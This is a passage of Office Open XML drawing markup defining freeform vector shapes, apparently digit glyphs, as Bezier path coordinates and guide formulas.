                <a:gd name="T8" fmla="*/ 0 w 111"/>
                <a:gd name="T9" fmla="*/ 117 h 194"/>
                <a:gd name="T10" fmla="*/ 0 w 111"/>
                <a:gd name="T11" fmla="*/ 77 h 194"/>
                <a:gd name="T12" fmla="*/ 15 w 111"/>
                <a:gd name="T13" fmla="*/ 19 h 194"/>
                <a:gd name="T14" fmla="*/ 55 w 111"/>
                <a:gd name="T15" fmla="*/ 0 h 194"/>
                <a:gd name="T16" fmla="*/ 96 w 111"/>
                <a:gd name="T17" fmla="*/ 19 h 194"/>
                <a:gd name="T18" fmla="*/ 111 w 111"/>
                <a:gd name="T19" fmla="*/ 77 h 194"/>
                <a:gd name="T20" fmla="*/ 111 w 111"/>
                <a:gd name="T21" fmla="*/ 117 h 194"/>
                <a:gd name="T22" fmla="*/ 74 w 111"/>
                <a:gd name="T23" fmla="*/ 73 h 194"/>
                <a:gd name="T24" fmla="*/ 69 w 111"/>
                <a:gd name="T25" fmla="*/ 40 h 194"/>
                <a:gd name="T26" fmla="*/ 56 w 111"/>
                <a:gd name="T27" fmla="*/ 30 h 194"/>
                <a:gd name="T28" fmla="*/ 55 w 111"/>
                <a:gd name="T29" fmla="*/ 30 h 194"/>
                <a:gd name="T30" fmla="*/ 42 w 111"/>
                <a:gd name="T31" fmla="*/ 40 h 194"/>
                <a:gd name="T32" fmla="*/ 37 w 111"/>
                <a:gd name="T33" fmla="*/ 73 h 194"/>
                <a:gd name="T34" fmla="*/ 37 w 111"/>
                <a:gd name="T35" fmla="*/ 120 h 194"/>
                <a:gd name="T36" fmla="*/ 42 w 111"/>
                <a:gd name="T37" fmla="*/ 154 h 194"/>
                <a:gd name="T38" fmla="*/ 55 w 111"/>
                <a:gd name="T39" fmla="*/ 164 h 194"/>
                <a:gd name="T40" fmla="*/ 56 w 111"/>
                <a:gd name="T41" fmla="*/ 164 h 194"/>
                <a:gd name="T42" fmla="*/ 69 w 111"/>
                <a:gd name="T43" fmla="*/ 154 h 194"/>
                <a:gd name="T44" fmla="*/ 74 w 111"/>
                <a:gd name="T45" fmla="*/ 120 h 194"/>
                <a:gd name="T46" fmla="*/ 74 w 111"/>
                <a:gd name="T47" fmla="*/ 7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1" h="194">
                  <a:moveTo>
                    <a:pt x="111" y="117"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="142"/>
                    <a:pt x="106" y="162"/>
                    <a:pt x="96" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="188"/>
                    <a:pt x="72" y="194"/>
                    <a:pt x="56" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="194"/>
                    <a:pt x="25" y="188"/>
                    <a:pt x="15" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="162"/>
                    <a:pt x="0" y="142"/>
                    <a:pt x="0" y="11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2"/>
                    <a:pt x="15" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="6"/>
                    <a:pt x="38" y="0"/>
                    <a:pt x="55" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="0"/>
                    <a:pt x="86" y="6"/>
                    <a:pt x="96" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="32"/>
                    <a:pt x="111" y="52"/>
                    <a:pt x="111" y="77"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="111" y="117"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="74" y="73"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="58"/>
                    <a:pt x="72" y="47"/>
                    <a:pt x="69" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="33"/>
                    <a:pt x="61" y="30"/>
                    <a:pt x="56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49" y="30"/>
                    <a:pt x="45" y="33"/>
                    <a:pt x="42" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="47"/>
                    <a:pt x="37" y="58"/>
                    <a:pt x="37" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="120"/>
                    <a:pt x="37" y="120"/>
                    <a:pt x="37" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="136"/>
                    <a:pt x="38" y="147"/>
                    <a:pt x="42" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="161"/>
                    <a:pt x="49" y="164"/>
                    <a:pt x="55" y="16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2" y="164"/>
                    <a:pt x="66" y="161"/>
                    <a:pt x="69" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="147"/>
                    <a:pt x="74" y="136"/>
                    <a:pt x="74" y="120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="74" y="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88" name="Freeform 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78B22674-DC16-4F18-BA04-87809463C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6900" y="2953931"/>
              <a:ext cx="145640" cy="243668"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 115"/>
                <a:gd name="T1" fmla="*/ 191 h 191"/>
                <a:gd name="T2" fmla="*/ 3 w 115"/>
                <a:gd name="T3" fmla="*/ 191 h 191"/>
                <a:gd name="T4" fmla="*/ 3 w 115"/>
                <a:gd name="T5" fmla="*/ 166 h 191"/>
                <a:gd name="T6" fmla="*/ 55 w 115"/>
                <a:gd name="T7" fmla="*/ 101 h 191"/>
                <a:gd name="T8" fmla="*/ 69 w 115"/>
                <a:gd name="T9" fmla="*/ 76 h 191"/>
                <a:gd name="T10" fmla="*/ 74 w 115"/>
                <a:gd name="T11" fmla="*/ 56 h 191"/>
                <a:gd name="T12" fmla="*/ 69 w 115"/>
                <a:gd name="T13" fmla="*/ 36 h 191"/>
                <a:gd name="T14" fmla="*/ 56 w 115"/>
                <a:gd name="T15" fmla="*/ 29 h 191"/>
                <a:gd name="T16" fmla="*/ 42 w 115"/>
                <a:gd name="T17" fmla="*/ 38 h 191"/>
                <a:gd name="T18" fmla="*/ 37 w 115"/>
                <a:gd name="T19" fmla="*/ 62 h 191"/>
                <a:gd name="T20" fmla="*/ 1 w 115"/>
                <a:gd name="T21" fmla="*/ 62 h 191"/>
                <a:gd name="T22" fmla="*/ 1 w 115"/>
                <a:gd name="T23" fmla="*/ 61 h 191"/>
                <a:gd name="T24" fmla="*/ 15 w 115"/>
                <a:gd name="T25" fmla="*/ 17 h 191"/>
                <a:gd name="T26" fmla="*/ 56 w 115"/>
                <a:gd name="T27" fmla="*/ 0 h 191"/>
                <a:gd name="T28" fmla="*/ 96 w 115"/>
                <a:gd name="T29" fmla="*/ 15 h 191"/>
                <a:gd name="T30" fmla="*/ 111 w 115"/>
                <a:gd name="T31" fmla="*/ 56 h 191"/>
                <a:gd name="T32" fmla="*/ 103 w 115"/>
                <a:gd name="T33" fmla="*/ 88 h 191"/>
                <a:gd name="T34" fmla="*/ 75 w 115"/>
                <a:gd name="T35" fmla="*/ 127 h 191"/>
                <a:gd name="T36" fmla="*/ 51 w 115"/>
                <a:gd name="T37" fmla="*/ 162 h 191"/>
                <a:gd name="T38" fmla="*/ 115 w 115"/>
                <a:gd name="T39" fmla="*/ 162 h 191"/>
                <a:gd name="T40" fmla="*/ 115 w 115"/>
                <a:gd name="T41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91">
                  <a:moveTo>
                    <a:pt x="115" y="191"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="191"/>
                    <a:pt x="3" y="191"/>
                    <a:pt x="3" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="166"/>
                    <a:pt x="3" y="166"/>
                    <a:pt x="3" y="166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61" y="91"/>
                    <a:pt x="66" y="83"/>
                    <a:pt x="69" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="68"/>
                    <a:pt x="74" y="62"/>
                    <a:pt x="74" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="48"/>
                    <a:pt x="72" y="41"/>
                    <a:pt x="69" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="32"/>
                    <a:pt x="61" y="29"/>
                    <a:pt x="56" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="29"/>
                    <a:pt x="45" y="32"/>
                    <a:pt x="42" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="44"/>
                    <a:pt x="37" y="52"/>
                    <a:pt x="37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0" y="44"/>
                    <a:pt x="5" y="29"/>
                    <a:pt x="15" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="6"/>
                    <a:pt x="39" y="0"/>
                    <a:pt x="56" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="0"/>
                    <a:pt x="86" y="5"/>
                    <a:pt x="96" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="25"/>
                    <a:pt x="111" y="38"/>
                    <a:pt x="111" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="67"/>
                    <a:pt x="108" y="78"/>
                    <a:pt x="103" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="98"/>
                    <a:pt x="88" y="111"/>
                    <a:pt x="75" y="127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115" y="162"/>
                    <a:pt x="115" y="162"/>
                    <a:pt x="115" y="162"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="19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89" name="Freeform 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07E085E4-2C2B-4EB8-8161-6D497633E9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22327" y="4476531"/>
              <a:ext cx="140038" cy="247869"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 110 w 110"/>
                <a:gd name="T1" fmla="*/ 118 h 195"/>
                <a:gd name="T2" fmla="*/ 95 w 110"/>
                <a:gd name="T3" fmla="*/ 175 h 195"/>
                <a:gd name="T4" fmla="*/ 55 w 110"/>
                <a:gd name="T5" fmla="*/ 195 h 195"/>
                <a:gd name="T6" fmla="*/ 15 w 110"/>
                <a:gd name="T7" fmla="*/ 175 h 195"/>
                <a:gd name="T8" fmla="*/ 0 w 110"/>
                <a:gd name="T9" fmla="*/ 118 h 195"/>
                <a:gd name="T10" fmla="*/ 0 w 110"/>
                <a:gd name="T11" fmla="*/ 77 h 195"/>
                <a:gd name="T12" fmla="*/ 15 w 110"/>
                <a:gd name="T13" fmla="*/ 20 h 195"/>
                <a:gd name="T14" fmla="*/ 55 w 110"/>
                <a:gd name="T15" fmla="*/ 0 h 195"/>
                <a:gd name="T16" fmla="*/ 95 w 110"/>
                <a:gd name="T17" fmla="*/ 20 h 195"/>
                <a:gd name="T18" fmla="*/ 110 w 110"/>
                <a:gd name="T19" fmla="*/ 77 h 195"/>
                <a:gd name="T20" fmla="*/ 110 w 110"/>
                <a:gd name="T21" fmla="*/ 118 h 195"/>
                <a:gd name="T22" fmla="*/ 73 w 110"/>
                <a:gd name="T23" fmla="*/ 74 h 195"/>
                <a:gd name="T24" fmla="*/ 69 w 110"/>
                <a:gd name="T25" fmla="*/ 41 h 195"/>
                <a:gd name="T26" fmla="*/ 55 w 110"/>
                <a:gd name="T27" fmla="*/ 31 h 195"/>
                <a:gd name="T28" fmla="*/ 54 w 110"/>
                <a:gd name="T29" fmla="*/ 31 h 195"/>
                <a:gd name="T30" fmla="*/ 41 w 110"/>
                <a:gd name="T31" fmla="*/ 41 h 195"/>
                <a:gd name="T32" fmla="*/ 36 w 110"/>
                <a:gd name="T33" fmla="*/ 74 h 195"/>
                <a:gd name="T34" fmla="*/ 36 w 110"/>
                <a:gd name="T35" fmla="*/ 121 h 195"/>
                <a:gd name="T36" fmla="*/ 41 w 110"/>
                <a:gd name="T37" fmla="*/ 155 h 195"/>
                <a:gd name="T38" fmla="*/ 55 w 110"/>
                <a:gd name="T39" fmla="*/ 164 h 195"/>
                <a:gd name="T40" fmla="*/ 55 w 110"/>
                <a:gd name="T41" fmla="*/ 164 h 195"/>
                <a:gd name="T42" fmla="*/ 69 w 110"/>
                <a:gd name="T43" fmla="*/ 155 h 195"/>
                <a:gd name="T44" fmla="*/ 73 w 110"/>
                <a:gd name="T45" fmla="*/ 121 h 195"/>
                <a:gd name="T46" fmla="*/ 73 w 110"/>
                <a:gd name="T47" fmla="*/ 7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0" h="195">
                  <a:moveTo>
                    <a:pt x="110" y="118"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="143"/>
                    <a:pt x="105" y="162"/>
                    <a:pt x="95" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="188"/>
                    <a:pt x="72" y="195"/>
                    <a:pt x="55" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="195"/>
                    <a:pt x="25" y="188"/>
                    <a:pt x="15" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="162"/>
                    <a:pt x="0" y="143"/>
                    <a:pt x="0" y="118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3"/>
                    <a:pt x="15" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="7"/>
                    <a:pt x="38" y="0"/>
                    <a:pt x="55" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="0"/>
                    <a:pt x="85" y="7"/>
                    <a:pt x="95" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="33"/>
                    <a:pt x="110" y="52"/>
                    <a:pt x="110" y="77"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="110" y="118"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="73" y="74"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="59"/>
                    <a:pt x="72" y="48"/>
                    <a:pt x="69" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="34"/>
                    <a:pt x="61" y="30"/>
                    <a:pt x="55" y="31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49" y="30"/>
                    <a:pt x="44" y="34"/>
                    <a:pt x="41" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="48"/>
                    <a:pt x="36" y="59"/>
                    <a:pt x="36" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="121"/>
                    <a:pt x="36" y="121"/>
                    <a:pt x="36" y="121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="136"/>
                    <a:pt x="38" y="148"/>
                    <a:pt x="41" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="162"/>
                    <a:pt x="49" y="165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61" y="165"/>
                    <a:pt x="66" y="162"/>
                    <a:pt x="69" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="148"/>
                    <a:pt x="73" y="136"/>
                    <a:pt x="73" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="73" y="7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90" name="Freeform 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CB63913-DC3C-42FF-AC9B-483AE0193C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84772" y="4480732"/>
              <a:ext cx="148441" cy="239467"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 92 w 106"/>
                <a:gd name="T1" fmla="*/ 107 h 171"/>
                <a:gd name="T2" fmla="*/ 106 w 106"/>
                <a:gd name="T3" fmla="*/ 107 h 171"/>
                <a:gd name="T4" fmla="*/ 106 w 106"/>
                <a:gd name="T5" fmla="*/ 134 h 171"/>
                <a:gd name="T6" fmla="*/ 92 w 106"/>
                <a:gd name="T7" fmla="*/ 134 h 171"/>
                <a:gd name="T8" fmla="*/ 92 w 106"/>
                <a:gd name="T9" fmla="*/ 171 h 171"/>
                <a:gd name="T10" fmla="*/ 58 w 106"/>
                <a:gd name="T11" fmla="*/ 171 h 171"/>
                <a:gd name="T12" fmla="*/ 58 w 106"/>
                <a:gd name="T13" fmla="*/ 134 h 171"/>
                <a:gd name="T14" fmla="*/ 2 w 106"/>
                <a:gd name="T15" fmla="*/ 134 h 171"/>
                <a:gd name="T16" fmla="*/ 0 w 106"/>
                <a:gd name="T17" fmla="*/ 113 h 171"/>
                <a:gd name="T18" fmla="*/ 58 w 106"/>
                <a:gd name="T19" fmla="*/ 0 h 171"/>
                <a:gd name="T20" fmla="*/ 92 w 106"/>
                <a:gd name="T21" fmla="*/ 0 h 171"/>
                <a:gd name="T22" fmla="*/ 92 w 106"/>
                <a:gd name="T23" fmla="*/ 107 h 171"/>
                <a:gd name="T24" fmla="*/ 30 w 106"/>
                <a:gd name="T25" fmla="*/ 107 h 171"/>
                <a:gd name="T26" fmla="*/ 58 w 106"/>
                <a:gd name="T27" fmla="*/ 107 h 171"/>
                <a:gd name="T28" fmla="*/ 58 w 106"/>
                <a:gd name="T29" fmla="*/ 48 h 171"/>
                <a:gd name="T30" fmla="*/ 58 w 106"/>
                <a:gd name="T31" fmla="*/ 48 h 171"/>
                <a:gd name="T32" fmla="*/ 56 w 106"/>
                <a:gd name="T33" fmla="*/ 51 h 171"/>
                <a:gd name="T34" fmla="*/ 30 w 106"/>
                <a:gd name="T35" fmla="*/ 107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6" h="171">
                  <a:moveTo>
                    <a:pt x="92" y="107"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="106" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="107"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="30" y="107"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="58" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="48"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="48"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56" y="51"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30" y="10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91" name="Freeform 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A85398CC-3671-42F6-9759-D8B0FC0DC2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4800" y="5114109"/>
              <a:ext cx="141439" cy="247869"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 111 w 111"/>
                <a:gd name="T1" fmla="*/ 118 h 195"/>
                <a:gd name="T2" fmla="*/ 96 w 111"/>
                <a:gd name="T3" fmla="*/ 175 h 195"/>
                <a:gd name="T4" fmla="*/ 55 w 111"/>
                <a:gd name="T5" fmla="*/ 195 h 195"/>
                <a:gd name="T6" fmla="*/ 15 w 111"/>
                <a:gd name="T7" fmla="*/ 175 h 195"/>
                <a:gd name="T8" fmla="*/ 0 w 111"/>
                <a:gd name="T9" fmla="*/ 118 h 195"/>
                <a:gd name="T10" fmla="*/ 0 w 111"/>
                <a:gd name="T11" fmla="*/ 77 h 195"/>
                <a:gd name="T12" fmla="*/ 15 w 111"/>
                <a:gd name="T13" fmla="*/ 20 h 195"/>
                <a:gd name="T14" fmla="*/ 55 w 111"/>
                <a:gd name="T15" fmla="*/ 0 h 195"/>
                <a:gd name="T16" fmla="*/ 96 w 111"/>
                <a:gd name="T17" fmla="*/ 20 h 195"/>
                <a:gd name="T18" fmla="*/ 111 w 111"/>
                <a:gd name="T19" fmla="*/ 77 h 195"/>
                <a:gd name="T20" fmla="*/ 111 w 111"/>
                <a:gd name="T21" fmla="*/ 118 h 195"/>
                <a:gd name="T22" fmla="*/ 74 w 111"/>
                <a:gd name="T23" fmla="*/ 74 h 195"/>
                <a:gd name="T24" fmla="*/ 69 w 111"/>
                <a:gd name="T25" fmla="*/ 41 h 195"/>
                <a:gd name="T26" fmla="*/ 56 w 111"/>
                <a:gd name="T27" fmla="*/ 31 h 195"/>
                <a:gd name="T28" fmla="*/ 55 w 111"/>
                <a:gd name="T29" fmla="*/ 31 h 195"/>
                <a:gd name="T30" fmla="*/ 41 w 111"/>
                <a:gd name="T31" fmla="*/ 41 h 195"/>
                <a:gd name="T32" fmla="*/ 37 w 111"/>
                <a:gd name="T33" fmla="*/ 74 h 195"/>
                <a:gd name="T34" fmla="*/ 37 w 111"/>
                <a:gd name="T35" fmla="*/ 121 h 195"/>
                <a:gd name="T36" fmla="*/ 42 w 111"/>
                <a:gd name="T37" fmla="*/ 154 h 195"/>
                <a:gd name="T38" fmla="*/ 55 w 111"/>
                <a:gd name="T39" fmla="*/ 164 h 195"/>
                <a:gd name="T40" fmla="*/ 56 w 111"/>
                <a:gd name="T41" fmla="*/ 164 h 195"/>
                <a:gd name="T42" fmla="*/ 69 w 111"/>
                <a:gd name="T43" fmla="*/ 155 h 195"/>
                <a:gd name="T44" fmla="*/ 74 w 111"/>
                <a:gd name="T45" fmla="*/ 121 h 195"/>
                <a:gd name="T46" fmla="*/ 74 w 111"/>
                <a:gd name="T47" fmla="*/ 7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1" h="195">
                  <a:moveTo>
                    <a:pt x="111" y="118"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="143"/>
                    <a:pt x="106" y="162"/>
                    <a:pt x="96" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="188"/>
                    <a:pt x="72" y="195"/>
                    <a:pt x="55" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="195"/>
                    <a:pt x="25" y="188"/>
                    <a:pt x="15" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="162"/>
                    <a:pt x="0" y="143"/>
                    <a:pt x="0" y="118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3"/>
                    <a:pt x="15" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="7"/>
                    <a:pt x="38" y="0"/>
                    <a:pt x="55" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="0"/>
                    <a:pt x="86" y="7"/>
                    <a:pt x="96" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="33"/>
                    <a:pt x="111" y="52"/>
                    <a:pt x="111" y="77"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="111" y="118"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="74" y="74"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="59"/>
                    <a:pt x="72" y="48"/>
                    <a:pt x="69" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="34"/>
                    <a:pt x="61" y="30"/>
                    <a:pt x="56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49" y="30"/>
                    <a:pt x="45" y="34"/>
                    <a:pt x="41" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="48"/>
                    <a:pt x="37" y="59"/>
                    <a:pt x="37" y="74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37" y="136"/>
                    <a:pt x="38" y="147"/>
                    <a:pt x="42" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="162"/>
                    <a:pt x="49" y="165"/>
                    <a:pt x="55" y="16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2" y="165"/>
                    <a:pt x="66" y="162"/>
                    <a:pt x="69" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="148"/>
                    <a:pt x="74" y="136"/>
                    <a:pt x="74" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="74" y="7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92" name="Freeform 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16B921BE-D4C1-4EC8-B06B-05D680FA9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846" y="5118310"/>
              <a:ext cx="140038" cy="243668"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 3 w 111"/>
                <a:gd name="T1" fmla="*/ 105 h 192"/>
                <a:gd name="T2" fmla="*/ 13 w 111"/>
                <a:gd name="T3" fmla="*/ 0 h 192"/>
                <a:gd name="T4" fmla="*/ 105 w 111"/>
                <a:gd name="T5" fmla="*/ 0 h 192"/>
                <a:gd name="T6" fmla="*/ 105 w 111"/>
                <a:gd name="T7" fmla="*/ 30 h 192"/>
                <a:gd name="T8" fmla="*/ 43 w 111"/>
                <a:gd name="T9" fmla="*/ 30 h 192"/>
                <a:gd name="T10" fmla="*/ 39 w 111"/>
                <a:gd name="T11" fmla="*/ 75 h 192"/>
                <a:gd name="T12" fmla="*/ 49 w 111"/>
                <a:gd name="T13" fmla="*/ 68 h 192"/>
                <a:gd name="T14" fmla="*/ 62 w 111"/>
                <a:gd name="T15" fmla="*/ 65 h 192"/>
                <a:gd name="T16" fmla="*/ 98 w 111"/>
                <a:gd name="T17" fmla="*/ 81 h 192"/>
                <a:gd name="T18" fmla="*/ 111 w 111"/>
                <a:gd name="T19" fmla="*/ 128 h 192"/>
                <a:gd name="T20" fmla="*/ 96 w 111"/>
                <a:gd name="T21" fmla="*/ 173 h 192"/>
                <a:gd name="T22" fmla="*/ 55 w 111"/>
                <a:gd name="T23" fmla="*/ 192 h 192"/>
                <a:gd name="T24" fmla="*/ 16 w 111"/>
                <a:gd name="T25" fmla="*/ 177 h 192"/>
                <a:gd name="T26" fmla="*/ 0 w 111"/>
                <a:gd name="T27" fmla="*/ 138 h 192"/>
                <a:gd name="T28" fmla="*/ 1 w 111"/>
                <a:gd name="T29" fmla="*/ 137 h 192"/>
                <a:gd name="T30" fmla="*/ 36 w 111"/>
                <a:gd name="T31" fmla="*/ 135 h 192"/>
                <a:gd name="T32" fmla="*/ 42 w 111"/>
                <a:gd name="T33" fmla="*/ 155 h 192"/>
                <a:gd name="T34" fmla="*/ 55 w 111"/>
                <a:gd name="T35" fmla="*/ 162 h 192"/>
                <a:gd name="T36" fmla="*/ 69 w 111"/>
                <a:gd name="T37" fmla="*/ 153 h 192"/>
                <a:gd name="T38" fmla="*/ 74 w 111"/>
                <a:gd name="T39" fmla="*/ 129 h 192"/>
                <a:gd name="T40" fmla="*/ 69 w 111"/>
                <a:gd name="T41" fmla="*/ 102 h 192"/>
                <a:gd name="T42" fmla="*/ 54 w 111"/>
                <a:gd name="T43" fmla="*/ 92 h 192"/>
                <a:gd name="T44" fmla="*/ 42 w 111"/>
                <a:gd name="T45" fmla="*/ 96 h 192"/>
                <a:gd name="T46" fmla="*/ 36 w 111"/>
                <a:gd name="T47" fmla="*/ 108 h 192"/>
                <a:gd name="T48" fmla="*/ 3 w 111"/>
                <a:gd name="T49" fmla="*/ 105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1" h="192">
                  <a:moveTo>
                    <a:pt x="3" y="105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39" y="75"/>
                    <a:pt x="39" y="75"/>
                    <a:pt x="39" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="72"/>
                    <a:pt x="45" y="70"/>
                    <a:pt x="49" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="66"/>
                    <a:pt x="57" y="65"/>
                    <a:pt x="62" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="65"/>
                    <a:pt x="89" y="70"/>
                    <a:pt x="98" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="92"/>
                    <a:pt x="111" y="108"/>
                    <a:pt x="111" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="146"/>
                    <a:pt x="106" y="161"/>
                    <a:pt x="96" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="186"/>
                    <a:pt x="73" y="192"/>
                    <a:pt x="55" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="192"/>
                    <a:pt x="27" y="187"/>
